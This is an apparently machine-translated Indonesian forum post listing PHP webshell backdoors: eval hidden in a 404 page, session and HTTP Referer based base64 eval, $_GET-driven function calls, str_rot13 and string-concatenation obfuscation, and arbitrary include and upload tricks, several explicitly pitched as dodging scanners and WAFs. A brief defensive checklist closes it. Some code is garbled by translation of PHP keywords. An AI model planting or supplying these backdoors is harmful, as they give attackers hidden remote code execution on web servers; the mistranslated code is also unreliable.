Kami memperlakukan program pintu belakang PHP ini dengan mentalitas belajar, dan banyak kode pintu belakang PHP memungkinkan kami untuk melihat seberapa baik pemrogram.
Backdoor PHP yang kuat dalam satu kalimat
Backdoor semacam ini memungkinkan situs web,Administrator server sangat merepotkan dan sering harus mengubah metode untuk melakukan berbagai deteksi, dan banyak teknik penulisan baru tidak dapat ditemukan dan ditangani dengan metode deteksi biasa.
Hari ini kita akan menghitung beberapa Trojan PHP yang menarik.
1. Sembunyikan kuda poni PHP menggunakan halaman 404:
[mw_shl_code=php,benar] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Tidak Ditemukan</title> </head><body> <h1>Tidak Ditemukan</h1> URL <p>yang diminta tidak ditemukan di server ini.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Tidak Ditemukan'); ?>[/mw_shl_code]
404 page adalah file yang umum digunakan di situs web, dan hanya sedikit orang yang akan memeriksa dan memodifikasinya setelah direkomendasikan secara umum, sehingga kami dapat menggunakannya untuk menyembunyikan pintu belakang.
2. PHP tersembunyi tanpa fitur dalam satu kalimat:
[mw_shl_code=php,true]<?php session_start(); $_POST['kode'] && $_SESSION['kode'] = trim($_POST['kode']); $_SESSION['The Code']&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Tetapkan $_POST['code'] ke $_SESSION['theCode'], lalu jalankan $_SESSION['theCode'], dengan sorotan bahwa tidak ada kode tanda tangan.
Jika Anda menggunakan alat pemindaian untuk memeriksa kode, itu tidak akan alarm dan mencapai tujuan.
3. Pintu Belakang PHP Super Tersembunyi:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
Fungsi GET saja merupakan Trojan;
Cara menggunakan:
[mw_shl_code=php,benar] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Setelah eksekusi, direktori saat ini menghasilkan c.php Trojan kalimat, ketika parameter A adalah eval, pembuatan Trojan kesalahan gagal, dan ketika ditegaskan, itu juga akan melaporkan kesalahan, tetapi akan menghasilkan Trojan horse, yang tidak dapat diremehkan.
Permintaan level, kode untuk menjalankan backdoor PHP:
Metode ini diimplementasikan dengan dua file, file 1
[mw_shl_code=php,true]<?php
//1.php header('Content-type:text/html; charset = utf-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", meledak(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Dokumen 2
[mw_shl_code=php,true]<?php
//2.php header('Content-type:text/html; charset = utf-8′);
//要执行的代码 $code= <<<KODE phpinfo(); KODE;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= array( CURLOPT_URL => $url, CURLOPT_HEADER => SALAH, CURLOPT_RETURNTRANSFER => BENAR, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Jalankan kode yang dikodekan base64 melalui HTTP_REFERER dalam permintaan HTTP untuk mencapai efek backdoor.
Ada baiknya menggunakan ide ini untuk melewati waf.
4.PHP alat generator pintu belakang tenun
weevely adalah yang spesifik PHPPerangkat lunak bebas Webshell, dapat digunakan untuk mensimulasikan cangkang koneksi yang mirip dengan telnet, Weevely biasanya digunakan untuk eksploitasi program web, menyembunyikan pintu belakang atau menggunakan metode seperti telnet alih-alih manajemen berbasis halaman web, kode PHP sisi server yang dihasilkan oleh Weevely dikodekan base64, sehingga dapat menipu perangkat lunak antivirus dan IDS arus utama, Setelah Anda mengunggah kode sisi server, Anda biasanya dapat menjalankannya langsung melalui Weevely.
Fungsi yang digunakan di backdoor adalah fungsi pemrosesan string yang biasa digunakan, dan fungsi seperti eval dan sistem yang digunakan sebagai aturan inspeksi tidak akan muncul langsung di kode, sehingga file backdoor dapat melewati pemeriksaan alat pencarian backdoor. Pemindaian dengan alat deteksi backdoor web grup gelap menunjukkan bahwa file tersebut tidak terancam.
Di atas adalah pengantar umum, dan metode penggunaan yang relevan tidak diperkenalkan di sini, mempopulerkan sains sederhana.
4. Tiga Trojan PHP satu kalimat cacat Yang pertama:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
Yang kedua
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Tulis kata sandi http://site/2.php?_=assert&__=eval($_POST['pass']) di pisau dapur adalah pass.
Jika Anda menggunakan data tambahan pisau dapur, itu lebih tersembunyi, atau Anda dapat menggunakan alat injeksi lain, karena sudah dikirimkan pasca.
Yang ketiga
[mw_shl_code=php,benar] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'tambahkan'); [/mw_shl_code]
str_rot13 ('riny') adalah eval yang dikodekan, yang benar-benar menghindari kata kunci tanpa kehilangan efeknya, membuat orang muntah darah!
5. Terakhir, buat daftar beberapa pintu belakang Trojan PHP canggih:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Akses"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; termasuk($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Akses"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Singkatnya, backdoor PHP ini bisa digambarkan lengkap, jika Anda tidak berhati-hati, Anda pasti akan tertipu, dan apa yang menjadi prioritas utama artikel kami hari ini? Poin-poin kuncinya ada dalam ringkasan di bawah ini!
Cara menangani pintu belakang satu kalimat PHP: Kami menekankan beberapa poin penting, dan jika Anda membaca artikel ini, saya yakin Anda bukan orang awam, jadi saya tidak akan bertele-tele:
- Waspadai keamanan saat menulis program PHP
- File log server harus sering dibaca dan sering dicadangkan
- Penetapan izin yang ketat untuk setiap situs
- Tinjauan keamanan batch yang sering dilakukan untuk file dan direktori dinamis
- Pelajari cara melakukan anti-virus manual "Investigasi dan Pembunuhan Penghakiman Perilaku"
- Nantikan, atau menyusup ke kamp keamanan siber yang aktif
- Bahkan fungsi dapat digunakan sebagai aturan untuk pemrosesan hierarkis lingkungan server
Kami percaya bahwa ketika ada lebih banyak situs untuk dikelola dan sejumlah besar data, kami harus menerapkan beberapa alat tambahan, tetapi kami tidak boleh sepenuhnya mengandalkan alat ini, teknologi selalu diperbarui dan ditingkatkan, yang paling penting adalah Anda harus belajar dan memahami pemikiran menulis orang-orang pintu belakang yang kuat ini, dan transposisi peran dapat memberi Anda kemajuan yang lebih besar.
|